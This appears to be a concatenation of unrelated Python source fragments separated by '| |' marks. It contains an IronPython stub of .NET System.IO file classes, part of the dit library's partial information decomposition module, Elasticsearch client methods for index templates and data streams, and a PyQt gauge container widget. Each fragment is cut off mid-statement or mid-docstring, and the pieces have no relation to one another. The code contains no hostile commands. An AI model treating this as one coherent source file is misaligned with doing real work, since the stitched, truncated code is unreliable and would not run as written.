def __lt__(self, *args): #cannot find CLR method
pass
def __ne__(self, *args): #cannot find CLR method
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
def __str__(self, *args): #cannot find CLR method
pass
Archive = None
Compressed = None
Device = None
Directory = None
Encrypted = None
Hidden = None
IntegrityStream = None
Normal = None
NoScrubData = None
NotContentIndexed = None
Offline = None
ReadOnly = None
ReparsePoint = None
SparseFile = None
System = None
Temporary = None
value__ = None
class FileFormatException(FormatException, ISerializable, _Exception):
"""
The exception that is thrown when an input file or a data stream that is supposed to conform to a certain file format specification is malformed.
FileFormatException()
FileFormatException(message: str)
FileFormatException(message: str, innerException: Exception)
FileFormatException(sourceUri: Uri)
FileFormatException(sourceUri: Uri, message: str)
FileFormatException(sourceUri: Uri, innerException: Exception)
FileFormatException(sourceUri: Uri, message: str, innerException: Exception)
"""
def add_SerializeObjectState(self, *args): #cannot find CLR method
""" add_SerializeObjectState(self: Exception, value: EventHandler[SafeSerializationEventArgs]) """
pass
def GetObjectData(self, info, context):
"""
GetObjectData(self: FileFormatException, info: SerializationInfo, context: StreamingContext)
Sets the System.Runtime.Serialization.SerializationInfo object with the file
name and additional exception information.
info: The object that holds the serialized object data.
context: The contextual information about the source or destination.
"""
pass
def remove_SerializeObjectState(self, *args): #cannot find CLR method
""" remove_SerializeObjectState(self: Exception, value: EventHandler[SafeSerializationEventArgs]) """
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, *__args):
"""
__new__(cls: type)
__new__(cls: type, message: str)
__new__(cls: type, message: str, innerException: Exception)
__new__(cls: type, sourceUri: Uri)
__new__(cls: type, sourceUri: Uri, message: str)
__new__(cls: type, sourceUri: Uri, innerException: Exception)
__new__(cls: type, sourceUri: Uri, message: str, innerException: Exception)
__new__(cls: type, info: SerializationInfo, context: StreamingContext)
"""
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
def __str__(self, *args): #cannot find CLR method
pass
SourceUri = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the name of a file that caused the System.IO.FileFormatException.
Get: SourceUri(self: FileFormatException) -> Uri
"""
class FileInfo(FileSystemInfo, ISerializable):
"""
Provides properties and instance methods for the creation, copying, deletion, moving, and opening of files, and aids in the creation of System.IO.FileStream objects. This class cannot be inherited.
FileInfo(fileName: str)
"""
def AppendText(self):
"""
AppendText(self: FileInfo) -> StreamWriter
Creates a System.IO.StreamWriter that appends text to the file represented by
this instance of the System.IO.FileInfo.
Returns: A new StreamWriter.
"""
pass
def CopyTo(self, destFileName, overwrite=None):
"""
CopyTo(self: FileInfo, destFileName: str, overwrite: bool) -> FileInfo
Copies an existing file to a new file, allowing the overwriting of an existing
file.
destFileName: The name of the new file to copy to.
overwrite: true to allow an existing file to be overwritten; otherwise, false.
Returns: A new file, or an overwrite of an existing file if overwrite is true. If the
file exists and overwrite is false, an System.IO.IOException is thrown.
CopyTo(self: FileInfo, destFileName: str) -> FileInfo
Copies an existing file to a new file, disallowing the overwriting of an
existing file.
destFileName: The name of the new file to copy to.
Returns: A new file with a fully qualified path.
"""
pass
def Create(self):
"""
Create(self: FileInfo) -> FileStream
Creates a file.
Returns: A new file.
"""
pass
def CreateText(self):
"""
CreateText(self: FileInfo) -> StreamWriter
Creates a System.IO.StreamWriter that writes a new text file.
Returns: A new StreamWriter.
"""
pass
def Decrypt(self):
"""
Decrypt(self: FileInfo)
Decrypts a file that was encrypted by the current account using the
System.IO.FileInfo.Encrypt method.
"""
pass
def Delete(self):
"""
Delete(self: FileInfo)
Permanently deletes a file.
"""
pass
def Encrypt(self):
"""
Encrypt(self: FileInfo)
Encrypts a file so that only the account used to encrypt the file can decrypt
it.
"""
pass
def GetAccessControl(self, includeSections=None):
"""
GetAccessControl(self: FileInfo, includeSections: AccessControlSections) -> FileSecurity
Gets a System.Security.AccessControl.FileSecurity object that encapsulates the
specified type of access control list (ACL) entries for the file described by
the current System.IO.FileInfo object.
includeSections: One of the System.Security.AccessControl.AccessControlSections values that
specifies which group of access control entries to retrieve.
Returns: A System.Security.AccessControl.FileSecurity object that encapsulates the
access control rules for the current file.
GetAccessControl(self: FileInfo) -> FileSecurity
Gets a System.Security.AccessControl.FileSecurity object that encapsulates the
access control list (ACL) entries for the file described by the current
System.IO.FileInfo object.
Returns: A System.Security.AccessControl.FileSecurity object that encapsulates the
access control rules for the current file.
"""
pass
def MemberwiseClone(self, *args): #cannot find CLR method
"""
MemberwiseClone(self: MarshalByRefObject, cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity, which
will cause the object to be assigned a new identity when it is marshaled across
a remoting boundary. A value of false is usually appropriate. true to copy the
current System.MarshalByRefObject object's identity to its clone, which will
cause remoting client calls to be routed to the remote server object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def MoveTo(self, destFileName):
"""
MoveTo(self: FileInfo, destFileName: str)
Moves a specified file to a new location, providing the option to specify a new
file name.
destFileName: The path to move the file to, which can specify a different file name.
"""
pass
def Open(self, mode, access=None, share=None):
"""
Open(self: FileInfo, mode: FileMode, access: FileAccess, share: FileShare) -> FileStream
Opens a file in the specified mode with read, write, or read/write access and
the specified sharing option.
mode: A System.IO.FileMode constant specifying the mode (for example, Open or Append)
in which to open the file.
access: A System.IO.FileAccess constant specifying whether to open the file with Read,
Write, or ReadWrite file access.
share: A System.IO.FileShare constant specifying the type of access other FileStream
objects have to this file.
Returns: A System.IO.FileStream object opened with the specified mode, access, and
sharing options.
Open(self: FileInfo, mode: FileMode, access: FileAccess) -> FileStream
Opens a file in the specified mode with read, write, or read/write access.
mode: A System.IO.FileMode constant specifying the mode (for example, Open or Append)
in which to open the file.
access: A System.IO.FileAccess constant specifying whether to open the file with Read,
Write, or ReadWrite file access.
Returns: A System.IO.FileStream object opened in the specified mode and access, and
unshared.
Open(self: FileInfo, mode: FileMode) -> FileStream
Opens a file in the specified mode.
mode: A System.IO.FileMode constant specifying the mode (for example, Open or Append)
in which to open the file.
Returns: A file opened in the specified mode, with read/write access and unshared.
"""
pass
def OpenRead(self):
"""
OpenRead(self: FileInfo) -> FileStream
Creates a read-only System.IO.FileStream.
Returns: A new read-only System.IO.FileStream object.
"""
pass
def OpenText(self):
"""
OpenText(self: FileInfo) -> StreamReader
Creates a | |
<gh_stars>0
"""
Classes implementing the partial information decomposition.
"""
from __future__ import division
from abc import ABCMeta, abstractmethod
from six import with_metaclass
from sys import version_info
from itertools import product
import networkx as nx
import numpy as np
import prettytable
from .lattice import ascendants, descendants, least_upper_bound, pid_lattice, sort_key
from .. import ditParams
from ..multivariate import coinformation
from ..utils import flatten, powerset
class BasePID(with_metaclass(ABCMeta, object)):
"""
This implements the basic Williams & Beer Partial Information Decomposition.
"""
_red_string = "I_r"
_pi_string = "pi"
def __init__(self, dist, inputs=None, output=None, reds=None, pis=None, **kwargs):
"""
Parameters
----------
dist : Distribution
The distribution to compute the decomposition on.
inputs : iter of iters, None
The set of input variables. If None, `dist.rvs` less indices
in `output` is used.
output : iter, None
The output variable. If None, `dist.rvs[-1]` is used.
reds : dict, None
Redundancy values pre-assessed.
pis : dict, None
Partial information values pre-assessed.
"""
self._dist = dist
if output is None:
output = dist.rvs[-1]
if inputs is None:
inputs = [var for var in dist.rvs if var[0] not in output]
self._inputs = tuple(map(tuple, inputs))
self._output = tuple(output)
self._kwargs = kwargs
self._lattice = pid_lattice(self._inputs)
self._total = coinformation(self._dist, [list(flatten(self._inputs)), self._output])
self._compute(reds, pis)
@abstractmethod
def _measure(self, node, output):
"""
Compute a redundancy value for `node`.
Parameters
----------
node : tuple(tuples)
The lattice node to compute the redundancy of.
output : iterable
The indices to consider the target/output of the PID.
Returns
-------
red : float
The redundancy value.
"""
pass
@property
@abstractmethod
def _name(self):
"""
The name of the PID.
Returns
-------
name : str
The name.
"""
pass
def __eq__(self, other):
"""
Test if this and `other` are equal partial information decompositions.
Parameters
----------
other : BasePID
Returns
-------
eq : bool
If `self` and `other` are the same partial information decomposition.
"""
return all(np.isclose(self[node], other[node], atol=1e-5, rtol=1e-5) for node in self._lattice)
def __ne__(self, other):
"""
Test if this and `other` are not equal.
Parameters
----------
other : BasePID
Returns
-------
eq : bool
If `self` and `other` are different partial information decomposition.
"""
return not (self == other)
def __getitem__(self, key):
"""
Get the partial information value associated with `key`.
Parameters
----------
key : iterable of iterables
The node to get the partial information of.
Returns
-------
pi : float
The partial information associated with `key`.
"""
return float(self.get_partial(key))
def __repr__(self): # pragma: no cover
"""
Returns a representation of the PID.
Returns
-------
repr : str
A representation of this object.
"""
if ditParams['repr.print']:
return self.to_string()
else:
return super(BasePID, self).__repr__()
def __str__(self):
"""
Return a string representation of the PID.
Returns
-------
pid : str
The PID as a string.
"""
return self.to_string()
def _compute(self, reds=None, pis=None):
"""
Use the redundancy measure to populate the lattice.
"""
if reds is None: # pragma: no cover
reds = {}
if pis is None: # pragma: no cover
pis = {}
for node in self._lattice:
if node not in reds: # pragma: no branch
reds[node] = self._measure(self._dist, node, self._output, **self._kwargs)
reds, pis = self._compute_mobius_inversion(reds=reds, pis=pis)
nx.set_node_attributes(self._lattice, name='red', values=reds)
nx.set_node_attributes(self._lattice, name='pi', values=pis)
def _compute_mobius_inversion(self, reds=None, pis=None):
"""
Perform as much of a Mobius inversion as possible.
Parameters
----------
reds : dict
Currently known redundancy values.
pis : dict
Currently known partial information values.
Returns
-------
reds : dict
Updated redundancy values.
pis : dict
Updated partial information values.
"""
if reds is None: # pragma: no cover
reds = {}
if pis is None: # pragma: no cover
pis = {}
for node in reversed(list(nx.topological_sort(self._lattice))):
if node not in pis:
try:
pis[node] = reds[node] - sum(pis[n] for n in descendants(self._lattice, node))
except KeyError:
pass
return reds, pis
def get_redundancy(self, node):
"""
Return the redundancy associated with `node`.
Parameters
----------
node : tuple of tuples
The node to get the redundancy for.
Returns
-------
red : float
The redundancy associated with `node`.
"""
return self._lattice.node[node]['red']
def get_partial(self, node):
"""
Return the partial information associated with `node`.
Parameters
----------
node : tuple of tuples
The node to get the partial information for.
Returns
-------
pi : float
The partial information associated with `node`.
"""
return self._lattice.node[node]['pi']
def to_string(self, digits=4):
"""
Create a table representing the redundancy and PI lattices.
Parameters
----------
digits : int
The number of digits of precision to display.
Returns
-------
table : str
The table of values.
"""
red_string = self._red_string
pi_string = self._pi_string
table = prettytable.PrettyTable([self.name, red_string, pi_string], title=getattr(self._dist, 'name', ''))
if ditParams['text.font'] == 'linechar': # pragma: no cover
try:
table.set_style(prettytable.BOX_CHARS)
except AttributeError:
pass
table.float_format[red_string] = '{}.{}'.format(digits + 2, digits)
table.float_format[pi_string] = '{}.{}'.format(digits + 2, digits)
for node in sorted(self._lattice, key=sort_key(self._lattice)):
node_label = ''.join('{{{}}}'.format(':'.join(map(str, n))) for n in node)
red_value = self.get_redundancy(node)
pi_value = self.get_partial(node)
if np.isclose(0, red_value, atol=10 ** -(digits - 1), rtol=10 ** -(digits - 1)): # pragma: no cover
red_value = 0.0
if np.isclose(0, pi_value, atol=10 ** -(digits - 1), rtol=10 ** -(digits - 1)): # pragma: no cover
pi_value = 0.0
table.add_row([node_label, red_value, pi_value])
return table.get_string()
@property
def name(self): # pragma: no cover
"""
Get the name of the decomposition. If colorama is available, the name will be styled
according to its properties.
Returns
-------
name : str
The name of the decomposition.
"""
try:
from colorama import Fore, Style
inconsistent_style = lambda x: Fore.RED + x + Style.RESET_ALL
negative_style = lambda x: Fore.GREEN + x + Style.RESET_ALL
incomplete_style = lambda x: Fore.BLUE + x + Style.RESET_ALL
except:
inconsistent_style = lambda x: x
negative_style = lambda x: x
incomplete_style = lambda x: x
if not self.consistent:
return inconsistent_style(self._name)
elif not self.nonnegative:
return negative_style(self._name)
elif not self.complete:
return incomplete_style(self._name)
else:
return self._name
@property
def consistent(self):
"""
Determine if the assignment of values to the lattice is self-consistent.
Returns
-------
valid : bool
True if the lattice is self-consistent, False otherwise.
"""
return True
@property
def nonnegative(self):
"""
Determine if the partial information values are all non-negative.
Returns
-------
nonnegative : bool
True if all pi values are non-negative, False otherwise.
"""
pis = nx.get_node_attributes(self._lattice, 'pi')
nonnegative = all(pi >= -1e-6 for pi in pis.values() if not np.isnan(pi))
return nonnegative
@property
def complete(self):
"""
Determine if all partial information values are assigned.
Returns
-------
valid : bool
True if the lattice is self-consistant, False otherwise.
"""
return True
class BaseIncompletePID(BasePID):
"""
A special PID class for measures which do not compute the redundancy of an arbitrary antichain.
Properties
----------
LATTICE_MONOTONICITY : bool
REDUCED_PID : bool
SELF_REDUNDANCY : bool
"""
LATTICE_MONOTONICITY = True
REDUCED_PID = True
SELF_REDUNDANCY = True
def __eq__(self, other):
"""
Test if this and `other` are equal partial information decompositions.
Parameters
----------
other : BasePID
Returns
-------
eq : bool
If `self` and `other` are the same partial information decomposition.
"""
equal_pi = super(BaseIncompletePID, self).__eq__(other)
equal_red = (np.isclose(self.get_redundancy(node), other.get_redundancy(node), atol=1e-5, rtol=1e-5) for node in self._lattice)
return equal_pi and all(equal_red)
def _compute_lattice_monotonicity(self, reds, pis):
"""
Infer the redundancy and partial information of lattice elements via lattice monotonicity.
Parameters
----------
reds : dict
Currently known redundancy values.
pis : dict
Currently known partial information values.
Returns
-------
reds : dict
Updated redundancy values.
pis : dict
Updated partial information values.
"""
# everything below a redundancy of 0 is a redundancy of 0
nodes = list(nx.topological_sort(self._lattice))
while nodes:
node = nodes.pop(0)
if node in reds and np.isclose(0, reds[node]):
for n in descendants(self._lattice, node):
if n not in reds:
reds[n] = 0
nodes.remove(n)
# everything above a redundancy of I(inputs, output) is I(inputs, output)
nodes = list(reversed(list(nx.topological_sort(self._lattice))))
while nodes:
node = nodes.pop(0)
if node in reds and np.isclose(reds[node], self._total):
for n in ascendants(self._lattice, node):
if n not in reds:
reds[n] = self._total
nodes.remove(n)
# if redundancy of A == redundancy of B, then for all A -> C -> B, redundancy of C = redundancy of A, B
tops = [node for node in self._lattice if node in reds and any((n not in reds) for n in self._lattice[node])]
bottoms | |
explain: Return detailed information about the error
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg lenient: Specify whether format-based query failures (such
as providing text to a numeric field) should be ignored
:arg q: Query in the Lucene query string syntax
:arg rewrite: Provide a more detailed explanation showing the
actual Lucene query that will be executed.
"""
client, params = _deprecated_options(self, params)
return client._perform_request(
"POST",
_make_path(index, doc_type, "_validate", "query"),
params=params,
headers=headers,
body=body,
)
@query_params()
def create_data_stream(self, name, params=None, headers=None):
"""
Creates a data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: The name of the data stream
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"PUT", _make_path("_data_stream", name), params=params, headers=headers
)
@query_params("expand_wildcards")
def delete_data_stream(self, name, params=None, headers=None):
"""
Deletes a data stream.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: A comma-separated list of data streams to delete; use
`*` to delete all data streams
:arg expand_wildcards: Whether wildcard expressions should get
expanded to open or closed indices (default: open) Valid choices: open,
closed, hidden, none, all Default: open
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"DELETE", _make_path("_data_stream", name), params=params, headers=headers
)
@query_params("master_timeout", "timeout")
def delete_index_template(self, name, params=None, headers=None):
"""
Deletes an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg name: The name of the template
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"DELETE",
_make_path("_index_template", name),
params=params,
headers=headers,
)
@query_params("flat_settings", "local", "master_timeout")
def get_index_template(self, name=None, params=None, headers=None):
"""
Returns an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg name: A pattern that returned template names must match
:arg flat_settings: Return settings in flat format (default:
false)
:arg local: Return local information, do not retrieve the state
from master node (default: false)
:arg master_timeout: Explicit operation timeout for connection
to master node
"""
client, params = _deprecated_options(self, params)
return client._perform_request(
"GET", _make_path("_index_template", name), params=params, headers=headers
)
@query_params("cause", "create", "master_timeout")
def put_index_template(self, name, body, params=None, headers=None):
"""
Creates or updates an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg name: The name of the template
:arg body: The template definition
:arg cause: User defined reason for creating/updating the index
template
:arg create: Whether the index template should only be added if
new or can also replace an existing one
:arg master_timeout: Specify timeout for connection to master
"""
client, params = _deprecated_options(self, params)
for param in (name, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return client._perform_request(
"PUT",
_make_path("_index_template", name),
params=params,
headers=headers,
body=body,
)
@query_params("flat_settings", "local", "master_timeout")
def exists_index_template(self, name, params=None, headers=None):
"""
Returns information about whether a particular index template exists.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg name: The name of the template
:arg flat_settings: Return settings in flat format (default:
false)
:arg local: Return local information, do not retrieve the state
from master node (default: false)
:arg master_timeout: Explicit operation timeout for connection
to master node
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"HEAD", _make_path("_index_template", name), params=params, headers=headers
)
@query_params("cause", "create", "master_timeout")
def simulate_index_template(self, name, body=None, params=None, headers=None):
"""
Simulate matching the given index name against the index templates in the
system
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg name: The name of the index (it must be a concrete index
name)
:arg body: New index template definition, which will be included
in the simulation, as if it already exists in the system
:arg cause: User defined reason for dry-run creating the new
template for simulation purposes
:arg create: Whether the index template we optionally defined in
the body should only be dry-run added if new or can also replace an
existing one
:arg master_timeout: Specify timeout for connection to master
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"POST",
_make_path("_index_template", "_simulate_index", name),
params=params,
headers=headers,
body=body,
)
@query_params("expand_wildcards")
def get_data_stream(self, name=None, params=None, headers=None):
"""
Returns data streams.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: A comma-separated list of data streams to get; use
`*` to get all data streams
:arg expand_wildcards: Whether wildcard expressions should get
expanded to open or closed indices (default: open) Valid choices: open,
closed, hidden, none, all Default: open
"""
client, params = _deprecated_options(self, params)
return client._perform_request(
"GET", _make_path("_data_stream", name), params=params, headers=headers
)
@query_params("cause", "create", "master_timeout")
def simulate_template(self, body=None, name=None, params=None, headers=None):
"""
Simulate resolving the given template name or body
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:arg body: New index template definition to be simulated, if no
index template name is specified
:arg name: The name of the index template
:arg cause: User defined reason for dry-run creating the new
template for simulation purposes
:arg create: Whether the index template we optionally defined in
the body should only be dry-run added if new or can also replace an
existing one
:arg master_timeout: Specify timeout for connection to master
"""
client, params = _deprecated_options(self, params)
return client._perform_request(
"POST",
_make_path("_index_template", "_simulate", name),
params=params,
headers=headers,
body=body,
)
@query_params("expand_wildcards")
def resolve_index(self, name, params=None, headers=None):
"""
Returns information about any matching indices, aliases, and data streams
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-resolve-index-api.html>`_
:arg name: A comma-separated list of names or wildcard
expressions
:arg expand_wildcards: Whether wildcard expressions should get
expanded to open or closed indices (default: open) Valid choices: open,
closed, hidden, none, all Default: open
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"GET", _make_path("_resolve", "index", name), params=params, headers=headers
)
@query_params(
"allow_no_indices",
"expand_wildcards",
"ignore_unavailable",
"master_timeout",
"timeout",
)
def add_block(self, index, block, params=None, headers=None):
"""
Adds a block to an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/index-modules-blocks.html>`_
:arg index: A comma separated list of indices to add a block to
:arg block: The block to add (one of read, write, read_only or
metadata)
:arg allow_no_indices: Whether to ignore if a wildcard indices
expression resolves into no concrete indices. (This includes `_all`
string or when no indices have been specified)
:arg expand_wildcards: Whether to expand wildcard expression to
concrete indices that are open, closed or both. Valid choices: open,
closed, hidden, none, all Default: open
:arg ignore_unavailable: Whether specified concrete indices
should be ignored when unavailable (missing or closed)
:arg master_timeout: Specify timeout for connection to master
:arg timeout: Explicit operation timeout
"""
client, params = _deprecated_options(self, params)
for param in (index, block):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return client._perform_request(
"PUT", _make_path(index, "_block", block), params=params, headers=headers
)
@query_params()
def data_streams_stats(self, name=None, params=None, headers=None):
"""
Provides statistics on operations happening in a data stream.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: A comma-separated list of data stream names; use
`_all` or empty string to perform the operation on all data streams
"""
client, params = _deprecated_options(self, params)
return client._perform_request(
"GET",
_make_path("_data_stream", name, "_stats"),
params=params,
headers=headers,
)
@query_params()
def migrate_to_data_stream(self, name, params=None, headers=None):
"""
Migrates an alias to a data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: The name of the alias to migrate
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"POST",
_make_path("_data_stream", "_migrate", name),
params=params,
headers=headers,
)
@query_params()
def promote_data_stream(self, name, params=None, headers=None):
"""
Promotes a data stream from a replicated data stream managed by CCR to a
regular data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:arg name: The name of the data stream
"""
client, params = _deprecated_options(self, params)
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return client._perform_request(
"POST",
_make_path("_data_stream", "_promote", name),
params=params,
headers=headers,
)
@query_params(
"allow_no_indices",
"expand_wildcards",
"flush",
"ignore_unavailable",
"run_expensive_tasks",
)
def disk_usage(self, index, params=None, headers=None):
"""
Analyzes the disk usage of each field of an index or data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-disk-usage.html>`_
.. warning::
This API is **experimental** so may include breaking changes
or be removed in | |
the display
self._update_layout()
# central widget position property for bar type widgets
@property
def widget_position(self) -> ICWidgetPosition:
return None if self._central_widget is None else self._central_widget.position
@widget_position.setter
def widget_position(self, position: ICWidgetPosition) -> None:
if self._central_widget is None:
return
# this property is only for bar type widgets
if self.__container_type in (ICLinearContainerType.BAR, ICLinearContainerType.BAR_NO_TITLE, ICLinearContainerType.BAR_NO_VALUE,
ICLinearContainerType.BAR_NO_TITLE_NO_VALUE):
# if same as the previous position then nothing to do
if self._central_widget.position == position:
return
# set the position of the central widget
self._central_widget.position = position
# set the scale bar position
scale_position = ICWidgetPosition.opposite(position)
self.scale_bar_one.position = scale_position
# change the position of the container.
self.position = position
# update the display
self._update_layout()
@property
def first_scale_bar(self) -> ICLinearAxis:
return self.scale_bar_one
@property
def second_scale_bar(self) -> ICLinearAxis:
return self.scale_bar_two
# get the color of the title
@property
def title_text_color(self) -> QtGui.QColor:
return self._title_color
# set the title color
@title_text_color.setter
def title_text_color(self, clr: QtGui.QColor) -> None:
self._title_color = clr
self._title_format_changed = True
self._title_update()
# get the color of the title
@property
def value_text_color(self) -> QtGui.QColor:
return self._value_color
# set the title color
@value_text_color.setter
def value_text_color(self, clr: QtGui.QColor) -> None:
self._value_color = clr
self._value_format_changed = True
self._value_update()
# get the color of alarm text
@property
def alarm_colors(self) -> tuple[QtGui.QColor, QtGui.QColor]:
return self._error_back_color, self._error_text_color
# set the color of alarm text
@alarm_colors.setter
def alarm_colors(self, clrs: tuple[QtGui.QColor, QtGui.QColor]) -> None:
self._error_back_color = clrs[0]
self._error_text_color = clrs[1]
self._value_update()
# get the size of the title text
@property
def title_size(self) -> int:
return self._title_size
# set the size of the title text
@title_size.setter
def title_size(self, sz: int) -> None:
self._title_size = sz
self._title_format_changed = True
self._title_update()
# get the size of the value text
@property
def value_size(self) -> int:
return self._value_size
# set the size of the title text
@value_size.setter
def value_size(self, sz: int) -> None:
self._value_size = sz
self._value_format_changed = True
self._value_update()
# get the size of the title text
@property
def unit_size(self) -> int:
return self._unit_size
# set the size of the title text
@unit_size.setter
def unit_size(self, sz: int) -> None:
self._unit_size = sz
self._title_format_changed = True
self._value_format_changed = True
self._local_update()
# get the maximum width of the vertical gauge
@property
def vertical_gauge_width(self) -> int:
return self._maximum_vertical_width
# set the maximum width of the vertical gauge
@vertical_gauge_width.setter
def vertical_gauge_width(self, wd: int) -> None:
self._maximum_vertical_width = wd
if self.position.is_vertical():
self.setMaximumSize(self._maximum_vertical_width, QtWidgets.QWIDGETSIZE_MAX)
self._local_update()
# get the maximum height of the horizontal gauge
@property
def horizontal_gauge_height(self) -> int:
return self._maximum_horizontal_height
# set the maximum height of the horizontal gauge
@horizontal_gauge_height.setter
def horizontal_gauge_height(self, ht: int) -> None:
self._maximum_horizontal_height = ht
if self.position.is_horizontal():
self.setMaximumSize(QtWidgets.QWIDGETSIZE_MAX, self._maximum_horizontal_height)
self._local_update()
########################################################
# slots
########################################################
# handles the signal for value update
# @pyqtSlot(float)
def value_changed(self, val: float) -> None:
self.value = val
########################################################
# subclass callback functions
########################################################
# called when layout has been changed. sub-classes can reimplement this to update themselves
def on_layout_update(self) -> None:
pass
# called when value has been changed. sub-classes can reimplement this to update themselves
def on_value_update(self, value: float) -> None:
pass
########################################################
# layout management functions
########################################################
# setup display for BAR type
def _update_layout_bar(self) -> None:
if self.position.is_horizontal():
self.setMaximumSize(QtWidgets.QWIDGETSIZE_MAX, self._maximum_horizontal_height)
else:
self.setMaximumSize(self._maximum_vertical_width, QtWidgets.QWIDGETSIZE_MAX)
# get the position map based on the scale bar position
scale_position = ICWidgetPosition.opposite(self.position)
pos_map = self.__container_map[scale_position]
# place the gauge
index = self._layout.indexOf(self._central_widget)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map["gauge"]
self._layout.addWidget(self._central_widget, x[0], x[1], x[2], x[3])
# place the scale
if self.scale_bar_one is not None:
index = self._layout.indexOf(self.scale_bar_one)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map["scale"]
self._layout.addWidget(self.scale_bar_one, x[0], x[1], x[2], x[3])
# place the title
if self.__container_type in (ICLinearContainerType.BAR, ICLinearContainerType.BAR_NO_VALUE):
index = self._layout.indexOf(self._title_display)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map["title"]
self._layout.addWidget(self._title_display, x[0], x[1], x[2], x[3])
# place the value
if self.__container_type in (ICLinearContainerType.BAR, ICLinearContainerType.BAR_NO_TITLE):
index = self._layout.indexOf(self._value_display)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map["value"]
self._layout.addWidget(self._value_display, x[0], x[1], x[2], x[3])
# setup display for PLOT type
def _update_layout_plot(self) -> None:
# place the plot
index = self._layout.indexOf(self._central_widget)
if index >= 0:
_ = self._layout.takeAt(index)
self._layout.addWidget(self._central_widget, 1, 1, 2, 2)
# place the first scale
if self.scale_bar_one is not None:
pos_map_one = self.__container_map[self.scale_bar_one.position]
index = self._layout.indexOf(self.scale_bar_one)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map_one["scale"]
self._layout.addWidget(self.scale_bar_one, x[0], x[1], x[2], x[3])
# check if the second bar exists
if self.scale_bar_two is not None:
pos_map_two = self.__container_map[self.scale_bar_two.position]
# place the second scale
index = self._layout.indexOf(self.scale_bar_two)
if index >= 0:
_ = self._layout.takeAt(index)
x = pos_map_two["scale"]
self._layout.addWidget(self.scale_bar_two, x[0], x[1], x[2], x[3])
# place the title
if self.__container_type in (ICLinearContainerType.PLOT, ICLinearContainerType.PLOT_NO_VALUE):
index = self._layout.indexOf(self._title_display)
# place if it has not been placed
if index < 0:
self._layout.addWidget(self._title_display, 4, 1, 1, 1)
# place the value
if self.__container_type in (ICLinearContainerType.PLOT, ICLinearContainerType.PLOT_NO_TITLE):
index = self._layout.indexOf(self._value_display)
# place if it has not been placed
if index < 0:
self._layout.addWidget(self._value_display, 4, 2, 1, 1)
# setup display
def _update_layout(self) -> None:
if self.__container_type in (ICLinearContainerType.PLOT, ICLinearContainerType.PLOT_NO_TITLE, ICLinearContainerType.PLOT_NO_VALUE,
ICLinearContainerType.PLOT_NO_TITLE_NO_VALUE):
# update only if the central widget is set
if self._central_widget is None:
return
self._update_layout_plot()
else:
# update only if central widget is set
if self._central_widget is None:
return
self._update_layout_bar()
# notify the subclass about change in the layout
self.on_layout_update()
self.update()
# update title
def _title_update(self) -> None:
# nothing to do if hidden
if self.state == ICWidgetState.Hidden or self._title_display is None:
return
# set up the display style
if self._title_format_changed:
self._title_display.setStyleSheet("QLabel { background-color : " + ICDisplayConfig.QtColorToSting(self.background_color) + "; color : " +
ICDisplayConfig.QtColorToSting(self._title_color) + ";}")
self._title_format_changed = False
# update the text based on the state
if self.state in (ICWidgetState.Transparent, ICWidgetState.FrameOnly):
